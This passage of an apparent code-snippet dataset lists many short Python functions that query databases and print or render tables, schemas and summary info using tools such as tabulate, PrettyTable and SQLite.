self.snowflake_options.table", "def tableName():\n return \"people\"", "def print_poyo():\n\tpoyo = \"SELECT * FROM poyo\"\n\tcur.execute(poyo)\n\tprint_table(hdrs_poyo)", "def show_all_products():\n\n data = cur.execute(\"\"\"SELECT productid, productname, unitcost, stock FROM catalogue\"\"\").fetchall()\n\n print(tabulate(data, headers=[\"Product ID\", \"Name\", \"Cost\", \"Stock\"]))", "def __print_work_table(table):\n print \"%-5s %-30s %5s %5s %5s %5s %5s\" % ('Act', 'Pred', 'Block', 'Dummy', 'Succ', 'start', 'end')\n for k, col in sorted(table.items()):\n print \"%-5s %-30s %5s %5s %5s %5s %5s\" % tuple(\n [str(k)] + [list(col[0])] + [str(col[i]) for i in range(1, len(col))])", "def info(self) -> str:\n return tabulate(self.model_log_msg, self.head, tablefmt=\"presto\")", "def table_info(self, table_path: str, verbose:bool = True) -> Table:\n dataset, table = table_path.split('.')\n dataset_ref = self.client.dataset(dataset)\n table_ref = dataset_ref.table(table)\n info = self.client.get_table(table_ref)\n if verbose:\n pprint({'created': info.created,\n 'description': info.description,\n 'modified': info.modified,\n 'num_bytes': f'{info.num_bytes:,}',\n 'num_rows': f'{info.num_rows:,}',\n 'schema': info.schema})\n return info", "def tableau():\n return render_template(\n 'tableau.html',\n title='Market Data',\n year=\"2020\",\n message='Your market data page.'\n )", "def print_sansanito():\n\tssn = 
\"SELECT * FROM sansanito\"\n\tcur.execute(ssn)\n\tprint_table(hdrs_sansanito)", "def index():\n response = \"\"\n for table in config.TABLE_SCHEMA.keys():\n response = response + disco.examples(table)\n return response", "def show_tables(self) -> List[str]:\n return list(self.tb.keys())", "def tableau():\n return render_template(\n 'tableau.html',\n title='Market Data',\n year=datetime.now().year,\n message='Your market data page.'\n )", "def get_TABLE_info():\n defalt_width = 300\n defalt_height = 500\n defalt_thickness = 10\n\n message = 'Put width of table. (mm : int) (width >= 210)'\n width = rs.GetInteger(message, defalt_width, None, None)\n\n message = 'Put height of table. (mm : int) (height >= 250)'\n height = rs.GetInteger(message, defalt_height, None, None)\n\n message = 'Put thickness of material (1layer). (mm : int)'\n t_m = rs.GetReal(message, defalt_thickness, None, None)\n\n TABLE_info = [width, height, t_m]\n\n info = [\"width : %s\" % width, \"height : %s\" % height, \"thickness of material : %s\" % t_m]\n print (info)\n\n return TABLE_info", "def get_table_definition(jwt_payload: dict, schema_name: str, table_name: str):\n DJConnector.set_datajoint_config(jwt_payload)\n\n schema_virtual_module = dj.create_virtual_module(schema_name, schema_name)\n return getattr(schema_virtual_module, table_name).describe()", "def crearTabla(self):\n mensaje = self.base.createTable()\n showinfo('Resultado', mensaje)", "def get(self):\n return TableDetails.query.all(), 200", "def tables():\n return {\n \"MAT24_STD_OCTAD\" : STD_OCTAD,\n }", "def vm_table_view(vlab_api, info):\n vm_body = []\n vm_header = ['Name', 'IPs', 'Type', 'Version', 'Powered', 'Networks']\n for vm, data in info.items():\n body = {'url': data['console']}\n network = data.get('networks', ['?'])\n kind = data['meta']['component']\n version = data['meta']['version']\n power = data['state'].replace('powered', '')\n row = [vm, '\\n'.join(data['ips']), kind, version, power, ','.join(network)]\n vm_body.append(row)\n if not vm_body:\n table = None\n else:\n table = tabulate(vm_body, headers=vm_header, tablefmt='presto')\n return table", "def main():\n national_university_table()", "def index(self):\n s = \"\"\n\n sb = []\n for sim in self.simulations.values():\n url = \"{0.uid}/{0.password}/status\".format(sim)\n sb.append(\"<a href='{0}'>{1.uid}</a></br>\".format(\n url, sim))\n s += \"<b>Simulations running:</b></br>\"\n s += \"\\n\".join(sb)\n\n s += \"<b>List of items in shop:</b>\\n</br>\"\n s += \"\\n</br>\".join(self.shop.itemAndCostDict.keys())\n \n s += \"</br><b>List of all items:</b>\\n</br>\"\n s += \"\\n</br>\".join(item.items.keys())\n\n return s", "def deployment_table(name, details, verbose=False):\n owner = '{} {}'.format(details['owner'], details['email'])\n title = 'Name : {}\\nOwner : {}\\nSummary : {}'.format(name, owner, details['summary'])\n if verbose:\n header = ['Component', 'IP']\n body = [[x, details['machines'][x]['ip']] for x in details['machines'].keys()]\n components = '{}\\n'.format(tabulate(body, headers=header, tablefmt='presto'))\n else:\n components = ''\n return '{}\\n{}'.format(title, components)", "def detailedInfo(cls):\n return 'tbd'", "def detailedInfo(cls):\n return 'tbd'", "def summary(self, light=False):\n tables = self.get_table_list()\n indexes = self.get_index_list()\n res = {}\n lines = []\n\n for t in tables:\n col = self.get_table_columns_list(t)\n if not light:\n size = self.get_table_nb_lines(t)\n first = self.get_table_nfirst_lines(t)\n else:\n size = -1\n first = 
[]\n\n res[t, \"columns\"] = col\n res[t, \"size\"] = size\n res[t, \"first_lines\"] = first\n\n lines.append(t + \"\\t\" + str(size) + \" records\")\n lines.append(\" columns\")\n for c in col:\n lines.append(\" \" + str(c))\n\n if len(first) > 0:\n lines.append(\" first_lines\")\n for lf in first:\n fo = []\n if lf is None:\n lines.append(\" None\")\n else:\n for x in lf:\n if not isinstance(x, str):\n fo.append(str(x))\n else:\n fo.append(x)\n lines.append(\" \" + \"\\t\".join(fo))\n\n if len(indexes) > 0:\n lines.append(\"\\n\")\n lines.append(\"indexes\")\n for tu in indexes:\n if isinstance(tu, (tuple, list)):\n lines.append(\" \" + \"\\t\".join([str(x) for x in tu]))\n else:\n lines.append(\" \" + tu)\n\n attached = self.get_attached_database_list()\n if len(attached) > 0:\n lines.append(\"\\n\")\n lines.append(\"attached databases\")\n for a in attached:\n if a == \"main\":\n continue\n lines.append(\" \" + \"\\t\" + a)\n continue\n # ~ rrr = self.execute(\n # ~ \"SELECT name FROM %s.sqlite_master ORDER BY name;\" %\n # ~ (a,))\n # ~ for b in rrr:\n # ~ lines.append(\" \" + \"\\t\" + b[0])\n\n return res, \"\\n\".join(lines)", "def print_mistakes_table():\n conn = sq.connect(host='localhost', user='root',\n password='student', database='quiz')\n cursor = conn.cursor()\n\n cursor.execute(\"select * from mistakes\")\n data = cursor.fetchall()\n\n table = PrettyTable()\n table.field_names = ['Question', 'Given Answer','User Given Answer']\n for row in data:\n table.add_row(row)\n conn.close()\n\n return table", "def buildSimpleInfoDeclaration(self):\n if self.info == \"\":\n raise Exception(\"Info block empty in symbol: \"+self.name)\n # buid some html to show\n dec = \" <tr>\\n\"\n dec += \" <td><a href=\\\"#\"+self.link+\"\\\">\"+self.name+\"</a></td>\\n\"\n dec += \" <td>\"+self.getPrettyType()\n dec += \"</td>\\n\"\n dec += \" <td>\"+self.info+\"</td>\\n\"\n dec += \" </tr>\\n\"\n return dec", "def wypisz_info(self):\n print(f\"Samochód: {self.producent} {self.model}\")", "def help_description():\n # for ain\n print(\"--------TABLE FOR AIN(AIN4=GND)-------\")\n print(\"--------------------------------------\")\n print(\"| CODE (10) | CODE (2) | AINP | AINN |\")\n for i in range(8):\n print(\"| {} | {} | AIN{} | AIN{} |\".format(str(i), bin(i)[2:].zfill(3), DICT_AIN[i][0],\n DICT_AIN[i][1]))\n print(\"--------------------------------------\")\n print(\"------------TABLE FOR FSR------------\")\n print(\"--------------------------------------\")\n print(\"| CODE (10) | CODE (2) | FSR |\")\n for i in range(6):\n print(\"| {} | {} | {} |\".format(str(i), bin(i)[2:].zfill(3), DICT_FSR[i]))\n print(\"--------------------------------------\")\n print(\"------------TABLE FOR RATE------------\")\n print(\"--------------------------------------\")\n print(\"| CODE (10) | CODE (2) | RATE |\")\n for i in range(8):\n print(\"| {} | {} | {} |\".format(str(i), bin(i)[2:].zfill(3), DICT_RATE[i].rjust(7, ' ')))\n print(\"--------------------------------------\")", "def show_tools():\n print(\"\"\"\n List the tools available in this package:\n create_date_features(df, date) #TODO\n create_date_feature_bisiness_quater(df = None, date = None)\n create_date_feature_daytime(df = None, date = None)\n create_date_feature_is_public_holiday(df, date, start, end, country = 'US')\n create_date_feature_is_month_end(df = None, date = None, last = 1)\n create_date_feature_is_weekend(df = None, date = None)\n create_date_feature_is_weekday(df = None, date = None)\n create_date_feature_season(df = None, date = 
None)\n create_grid(df, keys, target) #TODO\n create_lag_features_with_time_feature(df, cols, time, n = 5, fillna = True)\n create_lag_features_ohne_time_feature(df, cols, n = 5, fillna = True)\n create_window_feature(df, cols = None, col2 = None, win_size = 2, win_type = None, min_periods = 1, agg = 'mean')\n mean_encoder(df, cols, tg)\n \"\"\")", "def dump(self):\n # This is pretty, but we could just return the ddl_string\n outputs = [\"Table : %s\\n\" % self.name]\n # We show the columns in sequence order, using DSU\n # DSU = Decorate, Sort, Undecorate - a.k.a Schwartzian transform\n deco_cols = [ (x['sequence'], x) for x in list(self.columns.values()) ]\n deco_cols.sort()\n cols = [ col for seq, col in deco_cols ]\n for column in cols:\n outputs.append(\" %-30s\" % column['name'])\n if 'length' in column and column['length'] != None:\n if 'precision' in column and column['precision'] != None:\n # This column is a numeric data type\n column_defn = column['type']+self.__class__.calc_precision(column['type'], column['length'], column['precision'], column['scale'])\n else:\n # This column is a text data type\n column_defn = '%s(%d)' % (column['type'], column['length'])\n else:\n # This column is a simple data type such as date or boolean\n column_defn = column['type']\n outputs.append(\" %-15s \" % column_defn)\n if not column['nullable']:\n outputs.append(\" NOT NULL\")\n if 'special' in column:\n # Special case for e.g. 'enum' in MySQL\n outputs.append(' %s' % column['special'])\n outputs.append(\"\\n\")\n # Constraints please\n if len(self.constraints) != 0:\n outputs.append(\" Constraints;\\n\")\n for constraint_name, constraint in list(self.constraints.items()):\n outputs.append(\" %s, \" % constraint_name)\n outputs.append(\"%s \" % (constraint['type']))\n if 'columns' in constraint:\n outputs.append(\": \")\n outputs.append(', '.join(constraint['columns']))\n outputs.append(\"\\n\")\n # Indexes\n if len(self.indexes) > 0:\n outputs.append(\" Indexes:\\n\")\n for index_name, index in list(self.indexes.items()):\n outputs.append(\" %s, \" % index_name)\n outputs.append(\"%s\\n\" % index['type'])\n # Don't check number of columns because there must be at least 1\n outputs.append(\" Columns: \")\n outputs.append(\", \".join(index['columns']))\n outputs.append(\"\\n\")\n # LOG.debug(\"Table Dump output: \" + \"\".join(outputs))\n return \"\".join(outputs)", "def showTables():\n global cursor\n #cursor.execute('SELECT * FROM *')\n cursor.execute('''SELECT * FROM sqlite_master WHERE type='table' ''')\n\n tables = cursor.fetchall()\n print \"Tables available are:\"\n print tables[0]", "def html_data_table(self):\n return \"XXX\"", "def print_all_tables(self):\n conn = self.connect()\n cursor = conn.cursor()\n cursor.execute(\"SELECT name FROM sqlite_master WHERE type='table';\")\n print(cursor.fetchall())", "def print_database(self):\n table_names = self.catalog\n for table_name in table_names:\n table = self.parse_table(table_name)\n if not table:\n continue\n print(f'TABLE NAME: {table_name}\\r\\n')\n print(tabulate(table, headers=\"keys\"))\n print('\\r\\n\\r\\n\\r\\n\\r\\n')", "def table_summary():\n \n t = dict()\n t['name'] = get_names()\n t['Name'] = [get_properties(name)['label'] for name in t['name']]\n N = len(t['name'])\n \n # host\n t['host'] = ['Sagittarius', 'Sagittarius', 'none', 'Gaia-Sausage-Enceladus', 'Sagittarius', 'Sequoia / Arjuna / I\\'itoi', 'Sequoia / Arjuna', np.nan, np.nan, 'Sequoia / Arjuna', 'Gaia-Sausage-Enceladus', 'Sequoia / Arjuna', 'Helmi / Wukong', 'Helmi 
/ Wukong', 'Sagittarius', 'in situ / Helmi / Wukong', 'Helmi / Wukong', 'Cetus', 'Cetus', 'Sagittarius', 'Sequoia / Arjuna / I\\'itoi', 'Cetus', 'Sequoia / Arjuna / I\\'itoi']\n \n # progenitor\n t['progenitor'] = [np.nan, np.nan, 'itself', 'NGC 5139', 'NGC 4590', np.nan, 'NGC 3201', '(Wukong / Helmi)', '(Wukong / Helmi)', np.nan, np.nan, np.nan, np.nan, 'NGC 5024', np.nan, 'NGC 5272', 'NGC 5024', 'NGC 5824', 'NGC 5824', np.nan, np.nan, np.nan, np.nan]\n \n # progenitor type\n t['type'] = ['DG' if name in ['elqui', 'indus', 'jhelum'] else 'GC' for name in t['name']]\n \n # metallicity\n t['feh'] = [-2.4, -2.4, -2.2, -1.5, -2.16, -2.3, -1.5, -2.1, -2.1, -1.6, -1.95, -1.6, -2.7, np.nan, -1.7, -1.1, -2.7, -1.9, np.nan, np.nan, -2.2, np.nan, -1.9]\n \n # associations\n t['friends'] = ['ATLAS', 'Aliqa Uma', np.nan, np.nan, np.nan, np.nan, np.nan, 'Jhelum', 'Indus', np.nan, np.nan, np.nan, np.nan, 'Sylgr', np.nan, np.nan, 'Ravi', 'Turbio', 'Triangulum', np.nan, np.nan, np.nan, np.nan]\n \n tout = Table(t)\n tout.pprint()\n tout.write('../data/stream_origin.fits', overwrite=True)", "def info_on_utils_functions():\n\n table = PrettyTable([\"Utils functions\", \"Description\"])\n table.add_row(\n [\n \"clear_cache()\",\n (\n \"Clears the cache folder. \"\n \"Useful when updating `premise`\"\n \"or encountering issues with \"\n \"inventories.\"\n ),\n ]\n )\n table.add_row(\n [\n \"get_regions_definition(model)\",\n \"Retrieves the list of countries for each region of the model.\",\n ]\n )\n table.add_row(\n [\n \"ndb.NewDatabase(...)\\nndb.generate_scenario_report()\",\n \"Generates a summary of the most important scenarios' variables.\",\n ]\n )\n # align text to the left\n table.align = \"l\"\n table.hrules = ALL\n table._max_width = {\"Utils functions\": 50, \"Description\": 32}\n print(table)", "def show_table(table, has_customer_id=True):\n titles = [\"ID\", \"Title\", \"Price\", \"Date\"]\n if has_customer_id:\n titles.append(\"Customer ID\")\n output_table = [[row[ID], row[TITLE], row[PRICE],\n '/'.join((str(row[YEAR]), str(row[MONTH]), str(row[DAY]))), row[CUSTOMER_ID]] for row in table]\n else:\n output_table = [[row[ID], row[TITLE], row[PRICE],\n '/'.join((str(row[YEAR]), str(row[MONTH]), str(row[DAY])))] for row in table]\n\n ui.clear_scr()\n ui.print_table(output_table, titles, TITLE)", "def show_inventory(table):\r\n if (table):\r\n print('======= The Current Inventory: =======')\r\n print('ID\\tCD Title (by: Artist)\\n')\r\n for row in table:\r\n print('{}\\t{} (by:{})'.format(*row.values()))\r\n print('======================================')\r\n else:\r\n print ('Inventory is empty.\\n')\r\n # return None\r", "def do_ls(self, table: str = None) -> None:\n if table is None:\n table_descriptions = self.engine.describe_all()\n else:\n tables = list(self.engine.connection.list_tables())\n filtered = [t for t in tables if fnmatch(t, table)]\n if len(filtered) == 1:\n print(\n self.engine.describe(\n filtered[0], refresh=True, metrics=True\n ).pformat()\n )\n return\n elif len(filtered) == 0:\n raise EngineRuntimeError(\"Table %r not found\" % table)\n else:\n table_descriptions = [self.engine.describe(t, True) for t in filtered]\n fields = OrderedDict(\n [\n (\"Name\", \"name\"),\n (\"Status\", \"status\"),\n (\"Read\", \"total_read_throughput\"),\n (\"Write\", \"total_write_throughput\"),\n ]\n )\n # Calculate max width of all items for each column\n sizes = [\n 1\n + max([len(str(getattr(t, f))) for t in table_descriptions] + [len(title)])\n for title, f in fields.items()\n ]\n # Print 
the header\n for size, title in zip(sizes, fields):\n print(title.ljust(size), end=\"\")\n print()\n # Print each table row\n for row_table in table_descriptions:\n for size, field in zip(sizes, fields.values()):\n print(str(getattr(row_table, field)).ljust(size), end=\"\")\n print()", "def print_taboo_spaces(warehouse_id):\n problem_file = \"./warehouses/warehouse_{:02d}.txt\".format(warehouse_id)\n wh = Warehouse()\n wh.load_warehouse(problem_file)\n print(wh)\n print(\"TABOO CELLS: \")\n taboo = taboo_cells(wh)\n print(taboo)", "def print_tables(db):\n # connect to the database and create a cursor\n\n # select all columns using SQL command\n # 'SELECT * FROM StatelessCountByCountry'\n\n # print the data from StatelessCountByCountry\n\n # select all columns using SQL command\n # 'SELECT * FROM StatelessCountByRegion'\n\n # print the data from StatelessCountByRegion", "def show_from_database(self, table_model):\n arr = [4, 1]\n # TODO", "def print_info(self):\n\n n_metabolites = len(self.metabolites)\n n_reactions = len(self.reactions)\n n_constraints = len(self.constraints)\n n_variables = len(self.variables)\n\n info = pd.DataFrame(columns=['value'])\n info.loc['name'] = self.name\n info.loc['description'] = self.description\n info.loc['num constraints'] = n_constraints\n info.loc['num variables'] = n_variables\n info.loc['num metabolites'] = n_metabolites\n info.loc['num reactions'] = n_reactions\n info.index.name = 'key'\n\n print(info)", "def print_table(self):\n print(\"%-12s%-12s%-12s%-12s%-12s\" % (\"index\",\"balance\",\"payment\",\"interest\",\"amortization\"))\n print(\"-------------------------------------------------------------\")\n for i in self.table[\"index\"]:\n print(\"%-12i%-12i%-12i%-12i%-12i\" % (self.table[\"index\"][i],self.table[\"balance\"][i]\\\n ,self.table[\"payment\"][i],self.table[\"interest\"][i],\\\n self.table[\"amortization\"][i]))", "def data(self):\n worksheet_type = self.options[\"worksheet_type\"].value\n\n if worksheet_type.startswith(\"student\"):\n doc, tag, text, line = Doc().ttl()\n with tag(\"h3\"):\n text(WORKSHEET_OPTIONS[worksheet_type])\n\n line(\n \"style\",\n \"\"\"\n table {\n margin-bottom: 1cm;\n }\n td {\n border-collapse: collapse;\n height: 0.5cm;\n margin: 0;\n padding: 0;\n }\n td.bordered-cell {\n border: 1px solid black;\n width: 0.5cm;\n }\n td.label-cell {\n padding-left: 0.5cm;\n font-size: 0.4cm;\n line-height: 0.4cm;\n }\n \"\"\"\n )\n\n with tag(\"p\"):\n text(WORKSHEET_INTRODUCTION_TEXT[worksheet_type])\n\n if worksheet_type == \"student-basic\":\n # Table one\n self.add_run_length_encoding_table(\n tag,\n line,\n 9,\n 18,\n row_labels=[\n \"4, 11\",\n \"4, 9, 2, 1\",\n \"4, 9, 2, 1\",\n \"4, 11\",\n \"4, 9\",\n \"4, 9\",\n \"5, 7\",\n \"0, 17\",\n \"1, 15\",\n ]\n )\n # Table two\n self.add_run_length_encoding_table(\n tag,\n line,\n 13,\n 18,\n row_labels=[\n \"6, 5, 2, 3\",\n \"4, 2, 5, 2, 3, 1\",\n \"3, 1, 9, 1, 2, 1\",\n \"3, 1, 9, 1, 1, 1\",\n \"2, 1, 11, 1\",\n \"2, 1, 10, 2\",\n \"2, 1, 9, 1, 1, 1\",\n \"2, 1, 8, 1, 2, 1\",\n \"2, 1, 7, 1, 3, 1\",\n \"1, 1, 1, 1, 4, 2, 3, 1\",\n \"0, 1, 2, 1, 2, 2, 5, 1\",\n \"0, 1, 3, 2, 5, 2\",\n \"1, 3, 2, 5 \",\n ]\n )\n # Table three\n self.add_run_length_encoding_table(\n tag,\n line,\n 17,\n 18,\n row_labels=[\n \"6, 2, 2, 2\",\n \"5, 1, 2, 2, 2, 1\",\n \"6, 6\",\n \"4, 2, 6, 2\",\n \"3, 1, 10, 1\",\n \"2, 1, 12, 1\",\n \"2, 1, 3, 1, 4, 1, 3, 1\",\n \"1, 2, 12, 2\",\n \"0, 1, 16, 1\",\n \"0, 1, 6, 1, 2, 1, 6, 1\",\n \"0, 1, 7, 2, 7, 1\",\n \"1, 1, 14, 1\",\n \"2, 1, 12, 
1\",\n \"2, 1, 5, 2, 5, 1\",\n \"3, 1, 10, 1\",\n \"4, 2, 6, 2\",\n \"6, 6\",\n ]\n )\n else:\n line(\n \"style\",\n \"\"\"\n td.padding-cell {\n width: 0.5cm;\n }\n td.underline-cell {\n border-bottom: 1px solid #999;\n width: 8cm;\n }\n div.dotted-line {\n margin-top: 1cm;\n margin-bottom: 1cm;\n border-top: 1px dotted #888;\n }\n \"\"\"\n )\n self.add_run_length_encoding_table(tag, line, 16, 16, underline=True)\n line(\"div\", \"\", klass=\"dotted-line\")\n self.add_run_length_encoding_table(tag, line, 16, 16, underline=True)\n return {\"type\": \"html\", \"data\": doc.getvalue()}\n else:\n image = Image.open(\"static/img/resources/run-length-encoding/teacher-worksheet.png\")\n image = image.rotate(270, expand=True)\n return {\"type\": \"image\", \"data\": image}", "def table(self):\n return self.t", "def table_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"table_name\")", "def getTableInfo(self, lsstLevel, dbName, tableName):\n return self._doRequest(self.httpClient.getTableInfo, lsstLevel, dbName, tableName)", "def _show_info(self):\n\n dataframe = self._cache.get_source(config.DATAFRAME_ARTISTS)\n dataframe.printSchema()", "def _get_table(self, cursor):\n raise NotImplementedError", "def print_quick_report():\r\n print('function not yet written')\r\n # print a summary of the report as a structured pandas dataframe\r\n #Summary will include only date title and sentiment\r", "def details(self):\n pass", "def experiment_show_table_format(experiment):\n from msrestazure.tools import parse_resource_id\n row = OrderedDict()\n row['Name'] = experiment['name']\n row['Resource Group'] = experiment['resourceGroup']\n row['Workspace'] = parse_resource_id(experiment['id'])['name']\n row['State'] = experiment['provisioningState']\n return row", "def show_data(self, ):\r\n return print('society_name : {}\\n'\r\n 'flat : {}\\n'\r\n 'house_no : {}\\n'\r\n 'no_of_members : {}\\n'\r\n 'income : {}\\n '\r\n .format(self.society_name, self.flat, self.house_no, self.no_of_members, self.income))", "def table(cls):\n return cls.__name__", "def product_tables(self): \r\n\r\n self.mycursor.execute('CREATE TABLE IF NOT EXISTS product(\\\r\n PROD_id BIGINT PRIMARY KEY,\\\r\n PROD_name VARCHAR(100) NOT NULL,\\\r\n PROD_grade CHAR(1) NOT NULL,\\\r\n PROD_url VARCHAR(150) NOT NULL UNIQUE)')", "def __str__(self):\n tabuleiro = prettytable.PrettyTable(header=False)\n for linha in self.tabuleiro:\n tabuleiro.add_row(linha)\n return str(tabuleiro)", "def getTable(self):\n\n raise NotImplementedError", "def parse_table_schema(conn):\r\n cur = conn.cursor()\r\n\r\n cur.execute(\"PRAGMA table_info({})\".format(\"week5\"))\r\n print(cur.fetchall())", "def create_table_description(self):\n table_description = [\"Name\"]\n label = 0\n for i in range(self.total_days_count):\n #The name is never shown. 
Assure that it is small to not\n #column resizing\n table_description.append(\n (str(i), \"number\"))\n table_description.append((\n str(i + self.total_days_count), \"number\"))\n return table_description", "def tables() -> dict[str, str]:\n return {\n \"land_use\": \"zone_id\",\n \"tours\": \"tour_id\",\n \"trips\": \"trip_id\",\n \"persons\": \"person_id\",\n \"households\": \"household_id\",\n }", "def set_up_tables(self):\n tables = []\n tables.append({'groupname': 'metadata',\n 'tablename': 'sim_info',\n 'description': desc.SimInfoRow,\n 'tabletitle': 'Simulation Information'})\n tables.append({'groupname': 'metadata',\n 'tablename': 'sim_timeseries',\n 'description': desc.SimTimeseriesRow,\n 'tabletitle': 'Simulation Power Data'})\n tables.append({'groupname': 'th',\n 'tablename': 'th_params',\n 'description': desc.ThMetadataRow,\n 'tabletitle': 'TH Component Parameters'})\n tables.append({'groupname': 'th',\n 'tablename': 'th_timeseries',\n 'description': desc.ThTimeseriesRow,\n 'tabletitle': 'TH Timeseries'})\n tables.append({'groupname': 'neutronics',\n 'tablename': 'neutronics_timeseries',\n 'description': desc.NeutronicsTimeseriesRow,\n 'tabletitle': 'Neutronics Timeseries'})\n tables.append({'groupname': 'neutronics',\n 'tablename': 'neutronics_params',\n 'description': desc.NeutronicsParamsRow,\n 'tabletitle': 'Neutronics Metadata'})\n tables.append({'groupname': 'neutronics',\n 'tablename': 'zetas',\n 'description': desc.ZetasTimestepRow,\n 'tabletitle': 'Neutron Precursor Concentrations'})\n tables.append({'groupname': 'neutronics',\n 'tablename': 'omegas',\n 'description': desc.OmegasTimestepRow,\n 'tabletitle': 'Decay Heat Fractions'})\n return tables", "def show_inventory(table):\r\n print('======= The Current Inventory: =======')\r\n print('ID\\tCD Title by: Artist\\n')\r\n for cd in table:\r\n print(cd)\r\n\r\n print('======================================')", "def get_summary_of_records(self):\n ids = self.get_saleman_ids()\n table = [\n [\"Seller name\",\"Number of sales\",\"Total Value ($)\"]\n ]\n for id in ids:\n table_id = [self.get_seller_name(id),self.get_number_of_sales(id),\n self.get_total_of_saleman(id)]\n table.append(table_id)\n data_table = AsciiTable(table)\n print(data_table.table)", "def show_research(self):\n self.list_research = orm_imp.read_research()\n print(\"========================================================\")\n for row in self.list_research:\n print(\n row[\"date\"], \"|| Produit :\", row['subcat'],\n \"|| Meilleure proposition :\", row['product'], \"| Score :\",\n row['nutriscore'], \"| Lien :\", row['url'],\n \"| Ingrédients :\", row['ingredient'])\n print(\"========================================================\")", "def description(self):\n # Sleep until we're done or we got the columns\n self._fetch_while(\n lambda: self._columns is None and\n self._state not in (self._STATE_NONE, self._STATE_FINISHED)\n )\n if self._columns is None:\n return None\n\n #TODO Configure for various storage plugins\n\n showRegexObj = re.match(r'SHOW', self._operation, re.I )\n if showRegexObj:\n result = [\n # name, type_code, display_size, internal_size, precision, scale, null_ok\n (col, 15, None, None, None, None, True)\n for col in self._columns\n ]\n else:\n types = self._get_column_types()\n result = [\n # name, type_code, display_size, internal_size, precision, scale, null_ok\n (col, self._get_type_code( types[col] ), None, None, None, None, True )\n for col in self._columns\n ]\n return result", "def getInfo():", "def test_010_info(self):\n 
HEADING()\n db = self.db\n\n db.connect()\n db.info()\n pass", "def info():\n print 'Loading info page'\n\n team_list = datastore.get_all_teams(engine)\n\n return render_template('info.html', rows=team_list)", "def __str__(self):\n\n table_list = [self.headers]\n\n for row in self.data:\n table_list.append([row[col] or \"\" for col in self.headers])\n\n return create_table_string(table_list)", "def table_name() -> str:\n pass", "def getTable(self):\n return self.table", "def _get_table(self):\n\t\treturn self._table", "def table(self):\r\n return self._table", "def __str__(self):\n dictt = self.getFullDict()\n return \"SymbolTable(\\n{}\\n)\".format(pprint.pformat(dictt))", "def make_new_tbl(self):\n debug = False\n default_dd = getdata.get_default_db_dets()\n con, cur = default_dd.con, default_dd.cur\n oth_name_types = getdata.get_oth_name_types(self.settings_data)\n tblname = self.tblname_lst[0]\n if debug: print(f'DBE in make_new_tbl is: {default_dd.dbe}')\n getdata.make_sofa_tbl(\n con, cur, tblname, oth_name_types, headless=False)\n wx.MessageBox(\n _('Your new table has been added to the default SOFA database'))", "def get_info(self):\n return \"TODO !\"", "def describe(self) -> str:", "def show_equipments(self): \n database = Database('data/database.db')\n equipments = database.read_equipments()\n view = Template(filename=\"view/template.html\", lookup=lookup)\n \n \n return view.render(\n rows = [[item.number, item.name, item.installation_number] for item in equipments],\n pageTitle = \"Équipements\",\n tableTitle = \"Liste de tous les équipements\",\n ths = [\"Numéro\", \"Nom\", \"Numéro d'installation\"]\n )", "def print_help(self):\r\n\r\n print (\"\"\"Show data values for assignment.\r\n\r\nUsage:\r\n cat <request or table path>\r\n cat --id <assignment_id> #Where assignment_id provided by 'vers <table path>' command\r\n\r\nFormatting flags:\r\n\r\n -c or --comments - Show comments on/off\r\n -nc or --no-comments\r\n\r\n -ph or --horizontal - Print table horizontally\r\n -pa or --vertical - Print table vertically\r\n (If no '--horizontal' or '--vertical' flag is given, the layout of table is determined automatically:\r\n vertical layout if table has only 1 row and more than 3 columns, horizontal otherwise)\r\n\r\n -b or --borders - Switch show borders on of off\r\n -nb or --no-borders\r\n\r\n -h or --header - Show header on/off\r\n -nh or --no-header\r\n\r\n -t or --time - Show time\r\n -nt or --no-time\r\n\r\nExamples:\r\n > cat /test/test_vars/test_table #print latest data for test_table\r\n > cat /test/test_vars/test_table::subtest #print latest data in subtest variation\r\n > cat /test/test_vars/test_table:::2012-08 #print data latest for august 2012\r\n\r\nSee also 'dump' command which is 'cat' formatted to save data to files. 
'help dump'\r\n\r\n \"\"\")", "def t1_show(**kwargs):\n sessiontoken = kwargs['sessiontoken']\n proxy = kwargs['proxy']\n json_response = get_t1_json(proxy, sessiontoken)\n if json_response != False:\n t1_gateways = json_response['results']\n table = PrettyTable(['Name', 'id', 'Type'])\n for i in t1_gateways:\n if 'type' not in i:\n i['type'] = None\n table.add_row([i[\"display_name\"], i[\"id\"], i[\"type\"]])\n print(table)\n else:\n print(\"Something went wrong, please try again.\")\n sys.exit(1)", "def setup_table() -> Table:\n table = Table(\n show_header=True,\n caption=caption(),\n box=box.MINIMAL_HEAVY_HEAD,\n header_style='bold #ffff00',\n title='CRYPTO CANDLESTICKS',\n title_style='bold #54ff00 underline',\n show_lines=True,\n safe_box=True,\n expand=True,\n )\n\n table.add_column('OPEN', justify='center', no_wrap=True)\n table.add_column('CLOSE', justify='center', no_wrap=True)\n table.add_column('HIGH', justify='center', no_wrap=True)\n table.add_column('LOW', justify='center', no_wrap=True)\n table.add_column('VOLUME', justify='center', no_wrap=True)\n table.add_column('TICKER', justify='center', no_wrap=True)\n table.add_column('INTERVAL', justify='center', no_wrap=True)\n table.add_column('TIME', justify='center', no_wrap=True)\n\n return table", "def legendarios_sansanito():\n\tcur.execute(\"\"\"\n\t\t\t\tSELECT nombre\n\t\t\t\tFROM sansanito\n\t\t\t\tWHERE legendary = 1\n\t\t\t\t\"\"\")\n\tprint_table([hdrs_sansanito[2],hdrs_sansanito[-4]])", "def __get_general_subscr_info(self):\n query = (\"SELECT d.datname, r.rolname, s.subenabled, \"\n \"s.subconninfo, s.subslotname, s.subsynccommit, \"\n \"s.subpublications FROM pg_catalog.pg_subscription s \"\n \"JOIN pg_catalog.pg_database d \"\n \"ON s.subdbid = d.oid \"\n \"JOIN pg_catalog.pg_roles AS r \"\n \"ON s.subowner = r.oid \"\n \"WHERE s.subname = %(name)s AND d.datname = %(db)s\")\n\n result = exec_sql(self, query, query_params={'name': self.name, 'db': self.db}, add_to_executed=False)\n if result:\n return result[0]\n else:\n return False", "def load_info():\n\n infofile = os.path.join(ROOTDIR, 'weirdos.info')\n info = Table().read(infofile, format='ascii')\n\n return info", "def info() -> None:" ]
